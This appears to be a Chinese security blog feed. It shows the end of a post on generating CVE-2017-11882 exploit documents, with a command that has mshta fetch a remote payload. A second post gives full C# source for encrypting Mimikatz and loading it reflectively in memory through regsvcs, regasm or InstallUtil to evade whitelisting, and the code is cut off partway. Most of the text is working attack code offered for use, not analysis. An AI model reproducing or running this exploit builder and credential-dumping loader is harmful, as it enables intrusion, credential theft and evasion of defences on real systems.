    使用方式很简单,如果要执行命令

    python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
    

    demo
    demo

    关于怎么进一步利用,可以参考之前写的《windows命令执行漏洞不会玩? 看我!》,由于有长度的限制,这里可以采用mshta的方式来执行。构造的命令如下:

    python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc
    

    最终效果如下:
    1.gif


    0 0
  • 12/19/17--06:03: .net2.0 加载最新Mimikatz (chan 69772723)
  • 0x00前言

    之前subtee更新过一个脚本,使用.net2.0来加载mimikatz,别人fork的源码地址在这里,今天看到了新的mimikatz版本更新,所以就顺便看了下这个代码,并尝试用这个代码加载新版本的mimikatz,具体过程如下。

    0x01生成加密字符串

    查看代码,里面存在mimikatz 32级64位的加密字符串,所以我们只需要进行替换即可,为了方便,扣了加密代码出来,如下:

    using System;
    using System.IO;
    using System.Text;
    using System.IO.Compression;
    using System.EnterpriseServices;
    using System.Collections.Generic;
    using System.Configuration.Install;
    using System.Runtime.InteropServices;
    using System.Security.Cryptography;
    
    /*
    Author: Evi1cg, Twitter: @Evi1cg
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  /out:encode.exe  /unsafe encode.cs
    */
    
    namespace test
    {
        class Program
        {
            public class Misc
        {
            //Change This!
            private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
    
            public static void Stage(string fileName, string Key, string outFile)
            {
    
                byte[] raw = FileToByteArray(fileName);
                byte[] file = Encrypt(raw, Key);
    
                FileStream fileStream = File.Create(outFile);
    
                fileStream.Write(file, 0, file.Length);//Write stream to temp file
    
                Console.WriteLine("File Ready, Now Deliver Payload");
    
            }
    
            public static byte[] FileToByteArray(string _FileName)
            {
                byte[] _Buffer = null;
                System.IO.FileStream _FileStream = new System.IO.FileStream(_FileName, System.IO.FileMode.Open, System.IO.FileAccess.Read);
                System.IO.BinaryReader _BinaryReader = new System.IO.BinaryReader(_FileStream);
                long _TotalBytes = new System.IO.FileInfo(_FileName).Length;
                _Buffer = _BinaryReader.ReadBytes((Int32)_TotalBytes);
                _FileStream.Close();
                _FileStream.Dispose();
                _BinaryReader.Close();
                return _Buffer;
            }
    
            public static byte[] Encrypt(byte[] plain, string password)
            {
                MemoryStream memoryStream;
                CryptoStream cryptoStream;
                Rijndael rijndael = Rijndael.Create();
                Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                rijndael.Key = pdb.GetBytes(32);
                rijndael.IV = pdb.GetBytes(16);
                memoryStream = new MemoryStream();
                cryptoStream = new CryptoStream(memoryStream, rijndael.CreateEncryptor(), CryptoStreamMode.Write);
                cryptoStream.Write(plain, 0, plain.Length);
                cryptoStream.Close();
                return memoryStream.ToArray();
            }
            public static byte[] Decrypt(byte[] cipher, string password)
            {
                MemoryStream memoryStream;
                CryptoStream cryptoStream;
                Rijndael rijndael = Rijndael.Create();
                Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                rijndael.Key = pdb.GetBytes(32);
                rijndael.IV = pdb.GetBytes(16);
                memoryStream = new MemoryStream();
                cryptoStream = new CryptoStream(memoryStream, rijndael.CreateDecryptor(), CryptoStreamMode.Write);
                cryptoStream.Write(cipher, 0, cipher.Length);
                cryptoStream.Close();
                return memoryStream.ToArray();
            }
    
            public static byte[] ReadFully(Stream input) //Returns Byte Array From Stream
            {
                byte[] buffer = new byte[16 * 1024];
                using (MemoryStream ms = new MemoryStream())
                {
                    int read;
                    while ((read = input.Read(buffer, 0, buffer.Length)) > 0)
                    {
                        ms.Write(buffer, 0, read);
                    }
                    return ms.ToArray();
                }
            }
    
        }//End Misc Class
            static void Main(string[] args)
            {
                if (args.Length < 3)
                {
                    Console.WriteLine("usage: encode.exe input.exe out.txt password");
                }
                else
                {
                    string fileinput = args[0];
                    string fileoutput = args[1];
                    string password = args[2];
                    byte[] b  = Misc.FileToByteArray(fileinput);
                    byte[] e = Misc.Encrypt(b,password);
                    string f = System.Convert.ToBase64String(e);
                    File.WriteAllText(fileoutput,f);
    
                }
            }
        }
    }
    

    使用csc则可以编译,第一个参数为输入文件路径,第二个参数为输出的文件路径,第三个参数为加密密码。此密码需要与katz2.0.cs中的密码一致,并且脚本中的SALT也需要保持一致,SALT为随机的一组字节,用于使未经授权的消息更难解密。

    加密过程如下:

    1513687959081.png

    0x02修改katz2.0.cs

    修改katz2.0.cs中的mimikatz字符串内容,下面代码最下面的地方~

    using System;
    using System.IO;
    using System.Text;
    using System.IO.Compression;
    using System.EnterpriseServices;
    using System.Collections.Generic;
    using System.Configuration.Install;
    using System.Runtime.InteropServices;
    using System.Security.Cryptography;
    
    
    /*
    Author: Casey Smith, Twitter: @subTee
    License: BSD 3-Clause
    
    Create Your Strong Name Key -> key.snk
    
    $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
    $Content = [System.Convert]::FromBase64String($key)
    Set-Content key.snk -Value $Content -Encoding Byte
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe
    x64
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe katz.exe
    
    [OR]
    C:\Windows\Microsoft.NET\Framework\vv2.0.50727\regasm.exe katz.exe
    //Executes UnRegisterClass If you don't have permissions
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe /U katz.exe
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U katz.exe
    xC:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U katz.exe
    //This calls the UnregisterClass Method
    
    [OR]
    
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /U katz.exe
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /U katz.exe
    
    
    
    */
    
    
    // Find/Replace All "password"
    // Find "SALT" and update those bytes
    
    namespace Delivery
    {
    
        public class Program
        {
            public static void Main(string[] args)
            {
                if(args.Length == 2) {
                    if(args[0] == "encrypt") {
                        String file = args[1];
    
                        //Example Extract Files and Encrypt.  Ideally you would compress.  But .NET 2 doesn't have really good Compression Libraries..
                        //byte[] b  = Misc.FileToByteArray(@"mimikatz64.exe");
                        byte[] b  = Misc.FileToByteArray(@file);
                        byte[] e = Misc.Encrypt(b,"password");
                        string f = System.Convert.ToBase64String(e);
                        File.WriteAllText(@"file.b64",f);
                        Console.WriteLine("{0}", f);
    
                        /*
                        byte[] b1  = Misc.FileToByteArray(@"mimikatzx86.exe");
                        byte[] e1 = Misc.Encrypt(b1,"password");
                        string f1 = System.Convert.ToBase64String(e1);
                        File.WriteAllText(@"filex86.b64",f1);
                */
    
                    }
                else {
                    //Add any behaviour here to throw off sandbox execution/analysts :)
                    Katz.Exec();
    
                }
    
            }
    
        }
    
    
        [System.ComponentModel.RunInstaller(true)]
        public class Sample : System.Configuration.Install.Installer
        {
            //The Methods can be Uninstall/Install.  Install is transactional, and really unnecessary.
            public override void Uninstall(System.Collections.IDictionary savedState)
            {
    
                //Console.WriteLine("Hello There From Uninstall");
                Katz.Exec();
    
            }
    
        }
    
        public class Bypass : ServicedComponent
        {
            public Bypass() { //Console.WriteLine("I am a basic COM Object"); }
    
            [ComRegisterFunction] //This executes if registration is successful
            public static void RegisterClass(string key)
            {
                Katz.Exec();
            }
    
            [ComUnregisterFunction] //This executes if registration fails
            public static void UnRegisterClass(string key)
            {
                Katz.Exec();
            }
        }
    
    
    
        public class Katz
        {
            //Since .NET 2 doesn't have a method for this, this should do the trick...
            public static IntPtr IntPtrAdd(IntPtr a, int b)
            {
                IntPtr ptr = new IntPtr(a.ToInt64() + b);
                return ptr;
            }
    
            public static void Exec()
            {
    
    
                byte[] latestMimikatz = null;
                try
                {
    
                    //Use Misc Class to encrypt your own files
    
    
    
                    if (IntPtr.Size == 8 )
                    {
                        //x64 Unpack And Execute
                        latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex64), "password"); //Yes, this is a bad idea.
    
                    }
                    else if (IntPtr.Size == 4 )
                    {
                        //x86 Unpack And Execute
                        latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.filex86), "password"); //Yes, this is a bad idea.
    
                    }
    
    
    
                }
                catch (Exception ex)
                {
                    while (ex != null)
                    {
                        //Console.WriteLine(ex.Message);
                        ex = ex.InnerException;
                    }
                }
    
                //Console.WriteLine("Downloaded Latest");
                PELoader pe = new PELoader(latestMimikatz);
    
    
    
                IntPtr codebase = IntPtr.Zero;
    
                if (pe.Is32BitHeader)
                {
                    //Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader32.ImageBase.ToString("X4"));
                    codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                    //Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader32.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
                }
                else
                {
                    //Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader64.ImageBase.ToString("X4"));
                    codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                    //Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader64.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
                }
    
    
    
                //Copy Sections
                for (int i = 0; i < pe.FileHeader.NumberOfSections; i++)
                {
    
                    IntPtr y = NativeDeclarations.VirtualAlloc(IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[i].VirtualAddress), pe.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
                    Marshal.Copy(pe.RawBytes, (int)pe.ImageSectionHeaders[i].PointerToRawData, y, (int)pe.ImageSectionHeaders[i].SizeOfRawData);
                    //Console.WriteLine("Section {0}, Copied To {1}", new string(pe.ImageSectionHeaders[i].Name), y.ToString("X4"));
                }
    
                //Perform Base Relocation
                //Calculate Delta
                IntPtr currentbase = codebase;
                long delta;
                if (pe.Is32BitHeader)
                {
    
                    delta = (int)(currentbase.ToInt32() - (int)pe.OptionalHeader32.ImageBase);
                }
                else
                {
    
                    delta = (long)(currentbase.ToInt64() - (long)pe.OptionalHeader64.ImageBase);
                }
    
                //Console.WriteLine("Delta = {0}", delta.ToString("X4"));
    
                //Modify Memory Based On Relocation Table
                IntPtr relocationTable;
                if (pe.Is32BitHeader)
                {
                    relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader32.BaseRelocationTable.VirtualAddress));
                }
                else
                {
                    relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader64.BaseRelocationTable.VirtualAddress));
                }
    
    
                NativeDeclarations.IMAGE_BASE_RELOCATION relocationEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
                relocationEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
    
                int imageSizeOfBaseRelocation = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
                IntPtr nextEntry = relocationTable;
                int sizeofNextBlock = (int)relocationEntry.SizeOfBlock;
                IntPtr offset = relocationTable;
    
                while (true)
                {
    
                    NativeDeclarations.IMAGE_BASE_RELOCATION relocationNextEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
                    IntPtr x = IntPtrAdd(relocationTable, sizeofNextBlock);
                    relocationNextEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(x, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
    
                    IntPtr dest = IntPtrAdd(codebase, (int)relocationEntry.VirtualAdress);
    
                    for (int i = 0; i < (int)((relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); i++)
                    {
    
                        IntPtr patchAddr;
                        UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i));
    
                        UInt16 type = (UInt16)(value >> 12);
                        UInt16 fixup = (UInt16)(value & 0xfff);
    
                        switch (type)
                        {
                            case 0x0:
                                break;
                            case 0x3:
                                patchAddr = IntPtrAdd(dest, fixup);
                                //Add Delta To Location.
                                int originalx86Addr = Marshal.ReadInt32(patchAddr);
                                Marshal.WriteInt32(patchAddr, originalx86Addr + (int)delta);
                                break;
                            case 0xA:
                                patchAddr = IntPtrAdd(dest, fixup);
                                //Add Delta To Location.
                                long originalAddr = Marshal.ReadInt64(patchAddr);
                                Marshal.WriteInt64(patchAddr, originalAddr + delta);
                                break;
    
                        }
    
                    }
    
                    offset = IntPtrAdd(relocationTable, sizeofNextBlock);
                    sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock;
                    relocationEntry = relocationNextEntry;
    
                    nextEntry = IntPtrAdd(nextEntry, sizeofNextBlock);
    
                    if (relocationNextEntry.SizeOfBlock == 0) break;
    
    
                }
    
    
                //Resolve Imports
    
                IntPtr z;
                IntPtr oa1;
                int oa2;
    
                if (pe.Is32BitHeader)
                {
                    z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
                    oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
                    oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
                }
                else
                {
                    z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
                    oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
                    oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
                }
    
    
    
                //Get And Display Each DLL To Load
    
                IntPtr threadStart;
                IntPtr hThread;
                if (pe.Is32BitHeader)
                {
                    int j = 0;
                    while (true) //HardCoded Number of DLL's Do this Dynamically.
                    {
                        IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
                        int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
                        IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2));
                        IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
                        string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
                        if (DllName == "") { break; }
    
                        IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
                        //Console.WriteLine("Loaded {0}", DllName);
                        int k = 0;
                        while (true)
                        {
                            IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
                            string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
                            IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
                            Marshal.WriteInt32(a2, (int)funcAddy);
                            a2 = IntPtrAdd(a2, 4);
                            if (DllFuncName == "") break;
                            k++;
                        }
                        j++;
                    }
                    //Transfer Control To OEP
                    //Console.WriteLine("Executing Mimikatz");
                    threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader32.AddressOfEntryPoint);
                    hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
                    NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
    
                    //Console.WriteLine("Thread Complete");
                }
                else
                {
                    int j = 0;
                    while (true)
                    {
                        IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
                        int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
                        IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); //Need just last part?
                        IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
                        string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
                        if (DllName == "") { break; }
    
                        IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
                        //Console.WriteLine("Loaded {0}", DllName);
                        int k = 0;
                        while (true)
                        {
                            IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
                            string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
                            ////Console.WriteLine("Function {0}", DllFuncName);
                            IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
                            Marshal.WriteInt64(a2, (long)funcAddy);
                            a2 = IntPtrAdd(a2, 8);
                            if (DllFuncName == "") break;
                            k++;
                        }
                        j++;
                    }
                    //Transfer Control To OEP
                    //Console.WriteLine("Executing Mimikatz");
                    threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader64.AddressOfEntryPoint);
                    hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
                    NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
    
                    //Console.WriteLine("Thread Complete");
                }
    
                //Transfer Control To OEP
    
                //Console.WriteLine("Thread Complete");
                //Console.ReadLine();
    
    
    
    
            } //End Main
    
    
    
        }//End Program
    
        public class PELoader
        {
            public struct IMAGE_DOS_HEADER
            {      // DOS .EXE header
                public UInt16 e_magic;              // Magic number
                public UInt16 e_cblp;               // Bytes on last page of file
                public UInt16 e_cp;                 // Pages in file
                public UInt16 e_crlc;               // Relocations
                public UInt16 e_cparhdr;            // Size of header in paragraphs
                public UInt16 e_minalloc;           // Minimum extra paragraphs needed
                public UInt16 e_maxalloc;           // Maximum extra paragraphs needed
                public UInt16 e_ss;                 // Initial (relative) SS value
                public UInt16 e_sp;                 // Initial SP value
                public UInt16 e_csum;               // Checksum
                public UInt16 e_ip;                 // Initial IP value
                public UInt16 e_cs;                 // Initial (relative) CS value
                public UInt16 e_lfarlc;             // File address of relocation table
                public UInt16 e_ovno;               // Overlay number
                public UInt16 e_res_0;              // Reserved words
                public UInt16 e_res_1;              // Reserved words
                public UInt16 e_res_2;              // Reserved words
                public UInt16 e_res_3;              // Reserved words
                public UInt16 e_oemid;              // OEM identifier (for e_oeminfo)
                public UInt16 e_oeminfo;            // OEM information; e_oemid specific
                public UInt16 e_res2_0;             // Reserved words
                public UInt16 e_res2_1;             // Reserved words
                public UInt16 e_res2_2;             // Reserved words
                public UInt16 e_res2_3;             // Reserved words
                public UInt16 e_res2_4;             // Reserved words
                public UInt16 e_res2_5;             // Reserved words
                public UInt16 e_res2_6;             // Reserved words
                public UInt16 e_res2_7;             // Reserved words
                public UInt16 e_res2_8;             // Reserved words
                public UInt16 e_res2_9;             // Reserved words
                public UInt32 e_lfanew;             // File address of new exe header
            }
    
            [StructLayout(LayoutKind.Sequential)]
            public struct IMAGE_DATA_DIRECTORY
            {
                public UInt32 VirtualAddress;
                public UInt32 Size;
            }
    
            [StructLayout(LayoutKind.Sequential, Pack = 1)]
            public struct IMAGE_OPTIONAL_HEADER32
            {
                public UInt16 Magic;
                public Byte MajorLinkerVersion;
                public Byte MinorLinkerVersion;
                public UInt32 SizeOfCode;
                public UInt32 SizeOfInitializedData;
                public UInt32 SizeOfUninitializedData;
                public UInt32 AddressOfEntryPoint;
                public UInt32 BaseOfCode;
                public UInt32 BaseOfData;
                public UInt32 ImageBase;
                public UInt32 SectionAlignment;
                public UInt32 FileAlignment;
                public UInt16 MajorOperatingSystemVersion;
                public UInt16 MinorOperatingSystemVersion;
                public UInt16 MajorImageVersion;
                public UInt16 MinorImageVersion;
                public UInt16 MajorSubsystemVersion;
                public UInt16 MinorSubsystemVersion;
                public UInt32 Win32VersionValue;
                public UInt32 SizeOfImage;
                public UInt32 SizeOfHeaders;
                public UInt32 CheckSum;
                public UInt16 Subsystem;
                public UInt16 DllCharacteristics;
                public UInt32 SizeOfStackReserve;
                public UInt32 SizeOfStackCommit;
                public UInt32 SizeOfHeapReserve;
                public UInt32 SizeOfHeapCommit;
                public UInt32 LoaderFlags;
                public UInt32 NumberOfRvaAndSizes;
    
                public IMAGE_DATA_DIRECTORY ExportTable;
                public IMAGE_DATA_DIRECTORY ImportTable;
                public IMAGE_DATA_DIRECTORY ResourceTable;
                public IMAGE_DATA_DIRECTORY ExceptionTable;
                public IMAGE_DATA_DIRECTORY CertificateTable;
                public IMAGE_DATA_DIRECTORY BaseRelocationTable;
                public IMAGE_DATA_DIRECTORY Debug;
                public IMAGE_DATA_DIRECTORY Architecture;
                public IMAGE_DATA_DIRECTORY GlobalPtr;
                public IMAGE_DATA_DIRECTORY TLSTable;
                public IMAGE_DATA_DIRECTORY LoadConfigTable;
                public IMAGE_DATA_DIRECTORY BoundImport;
                public IMAGE_DATA_DIRECTORY IAT;
                public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
                public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
                public IMAGE_DATA_DIRECTORY Reserved;
            }
    
            [StructLayout(LayoutKind.Sequential, Pack = 1)]
            public struct IMAGE_OPTIONAL_HEADER64
            {
                public UInt16 Magic;
                public Byte MajorLinkerVersion;
                public Byte MinorLinkerVersion;
                public UInt32 SizeOfCode;
                public UInt32 SizeOfInitializedData;
                public UInt32 SizeOfUninitializedData;
                public UInt32 AddressOfEntryPoint;
                public UInt32 BaseOfCode;
                public UInt64 ImageBase;
                public UInt32 SectionAlignment;
                public UInt32 FileAlignment;
                public UInt16 MajorOperatingSystemVersion;
                public UInt16 MinorOperatingSystemVersion;
                public UInt16 MajorImageVersion;
                public UInt16 MinorImageVersion;
                public UInt16 MajorSubsystemVersion;
                public UInt16 MinorSubsystemVersion;
                public UInt32 Win32VersionValue;
                public UInt32 SizeOfImage;
                public UInt32 SizeOfHeaders;
                public UInt32 CheckSum;
                public UInt16 Subsystem;
                public UInt16 DllCharacteristics;
                public UInt64 SizeOfStackReserve;
                public UInt64 SizeOfStackCommit;
                public UInt64 SizeOfHeapReserve;
                public UInt64 SizeOfHeapCommit;
                public UInt32 LoaderFlags;
                public UInt32 NumberOfRvaAndSizes;
    
                public IMAGE_DATA_DIRECTORY ExportTable;
                public IMAGE_DATA_DIRECTORY ImportTable;
                public IMAGE_DATA_DIRECTORY ResourceTable;
                public IMAGE_DATA_DIRECTORY ExceptionTable;
                public IMAGE_DATA_DIRECTORY CertificateTable;
                public IMAGE_DATA_DIRECTORY BaseRelocationTable;
                public IMAGE_DATA_DIRECTORY Debug;
                public IMAGE_DATA_DIRECTORY Architecture;
                public IMAGE_DATA_DIRECTORY GlobalPtr;
                public IMAGE_DATA_DIRECTORY TLSTable;
                public IMAGE_DATA_DIRECTORY LoadConfigTable;
                public IMAGE_DATA_DIRECTORY BoundImport;
                public IMAGE_DATA_DIRECTORY IAT;
                public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
                public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
                public IMAGE_DATA_DIRECTORY Reserved;
            }
    
            [StructLayout(LayoutKind.Sequential, Pack = 1)]
            public struct IMAGE_FILE_HEADER
            {
                public UInt16 Machine;
                public UInt16 NumberOfSections;
                public UInt32 TimeDateStamp;
                public UInt32 PointerToSymbolTable;
                public UInt32 NumberOfSymbols;
                public UInt16 SizeOfOptionalHeader;
                public UInt16 Characteristics;
            }
    
            [StructLayout(LayoutKind.Explicit)]
            public struct IMAGE_SECTION_HEADER
            {
                [FieldOffset(0)]
                [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
                public char[] Name;
                [FieldOffset(8)]
                public UInt32 VirtualSize;
                [FieldOffset(12)]
                public UInt32 VirtualAddress;
                [FieldOffset(16)]
                public UInt32 SizeOfRawData;
                [FieldOffset(20)]
                public UInt32 PointerToRawData;
                [FieldOffset(24)]
                public UInt32 PointerToRelocations;
                [FieldOffset(28)]
                public UInt32 PointerToLinenumbers;
                [FieldOffset(32)]
                public UInt16 NumberOfRelocations;
                [FieldOffset(34)]
                public UInt16 NumberOfLinenumbers;
                [FieldOffset(36)]
                public DataSectionFlags Characteristics;
    
                public string Section
                {
                    get { return new string(Name); }
                }
            }
    
            [StructLayout(LayoutKind.Sequential)]
            public struct IMAGE_BASE_RELOCATION
            {
                public uint VirtualAdress;
                public uint SizeOfBlock;
            }
    
            [Flags]
            public enum DataSectionFlags : uint
            {
    
                Stub = 0x00000000,
    
            }
    
    
            /// The DOS header
    
            private IMAGE_DOS_HEADER dosHeader;
    
            /// The file header
    
            private IMAGE_FILE_HEADER fileHeader;
    
            /// Optional 32 bit file header
    
            private IMAGE_OPTIONAL_HEADER32 optionalHeader32;
    
            /// Optional 64 bit file header
    
            private IMAGE_OPTIONAL_HEADER64 optionalHeader64;
    
            /// Image Section headers. Number of sections is in the file header.
    
            private IMAGE_SECTION_HEADER[] imageSectionHeaders;
    
            private byte[] rawbytes;
    
    
    
            public PELoader(string filePath)
            {
                // Read in the DLL or EXE and get the timestamp
                using (FileStream stream = new FileStream(filePath, System.IO.FileMode.Open, System.IO.FileAccess.Read))
                {
                    BinaryReader reader = new BinaryReader(stream);
                    dosHeader = FromBinaryReader<IMAGE_DOS_HEADER>(reader);
    
                    // Add 4 bytes to the offset
                    stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin);
    
                    UInt32 ntHeadersSignature = reader.ReadUInt32();
                    fileHeader = FromBinaryReader<IMAGE_FILE_HEADER>(reader);
                    if (this.Is32BitHeader)
                    {
                        optionalHeader32 = FromBinaryReader<IMAGE_OPTIONAL_HEADER32>(reader);
                    }
                    else
                    {
                        optionalHeader64 = FromBinaryReader<IMAGE_OPTIONAL_HEADER64>(reader);
                    }
    
                    imageSectionHeaders = new IMAGE_SECTION_HEADER[fileHeader.NumberOfSections];
                    for (int headerNo = 0; headerNo < imageSectionHeaders.Length; ++headerNo)
                    {
                        imageSectionHeaders[headerNo] = FromBinaryReader<IMAGE_SECTION_HEADER>(reader);
                    }
    
    
    
                    rawbytes = System.IO.File.ReadAllBytes(filePath);
    
                }
            }
    
            public PELoader(byte[] fileBytes)
            {
                // Read in the DLL or EXE and get the timestamp
                using (MemoryStream stream = new MemoryStream(fileBytes, 0, fileBytes.Length))
                {
                    BinaryReader reader = new BinaryReader(stream);
                    dosHeader = FromBinaryReader<IMAGE_DOS_HEADER>(reader);
    
                    // Add 4 bytes to the offset
                    stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin);
    
                    UInt32 ntHeadersSignature = reader.ReadUInt32();
                    fileHeader = FromBinaryReader<IMAGE_FILE_HEADER>(reader);
                    if (this.Is32BitHeader)
                    {
                        optionalHeader32 = FromBinaryReader<IMAGE_OPTIONAL_HEADER32>(reader);
                    }
                    else
                    {
                        optionalHeader64 = FromBinaryReader<IMAGE_OPTIONAL_HEADER64>(reader);
                    }
    
                    imageSectionHeaders = new IMAGE_SECTION_HEADER[fileHeader.NumberOfSections];
                    for (int headerNo = 0; headerNo < imageSectionHeaders.Length; ++headerNo)
                    {
                        imageSectionHeaders[headerNo] = FromBinaryReader<IMAGE_SECTION_HEADER>(reader);
                    }
    
    
                    rawbytes = fileBytes;
    
                }
            }
    
    
            public static T FromBinaryReader<T>(BinaryReader reader)
            {
                // Read in a byte array
                byte[] bytes = reader.ReadBytes(Marshal.SizeOf(typeof(T)));
    
                // Pin the managed memory while, copy it out the data, then unpin it
                GCHandle handle = GCHandle.Alloc(bytes, GCHandleType.Pinned);
                T theStructure = (T)Marshal.PtrToStructure(handle.AddrOfPinnedObject(), typeof(T));
                handle.Free();
    
                return theStructure;
            }
    
    
    
            public bool Is32BitHeader
            {
                get
                {
                    UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100;
                    return (IMAGE_FILE_32BIT_MACHINE & FileHeader.Characteristics) == IMAGE_FILE_32BIT_MACHINE;
                }
            }
    
    
            public IMAGE_FILE_HEADER FileHeader
            {
                get
                {
                    return fileHeader;
                }
            }
    
    
            /// Gets the optional header
    
